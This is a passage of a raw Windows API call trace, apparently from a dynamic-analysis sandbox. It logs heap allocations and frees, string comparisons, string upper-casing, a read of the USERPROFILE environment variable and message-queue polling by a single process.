[0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0206.161] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.161] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0206.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LWx-lTCW5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wx-lTCW5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x-lTCW5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-lTCW5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lTCW5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TCW5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CW5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0206.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5BQnV", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0206.162] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.162] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0206.162] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0206.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0206.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77aa8 [0206.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LWx-lTCW5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wx-lTCW5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x-lTCW5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-lTCW5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lTCW5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TCW5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CW5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0206.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W5BQnV", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0206.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69bb0 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0206.163] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0206.163] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0206.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0206.164] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0206.164] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0206.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0206.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0206.164] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0206.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0206.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0206.165] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74bf0 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0206.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0206.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0206.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0206.166] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0206.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0206.166] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0206.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0206.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0206.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72208 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0206.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0206.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0206.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0206.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0206.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0206.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0206.169] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0206.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0206.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0206.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0206.170] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0206.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0206.170] HeapFree (in: hHeap=0x2af0000, 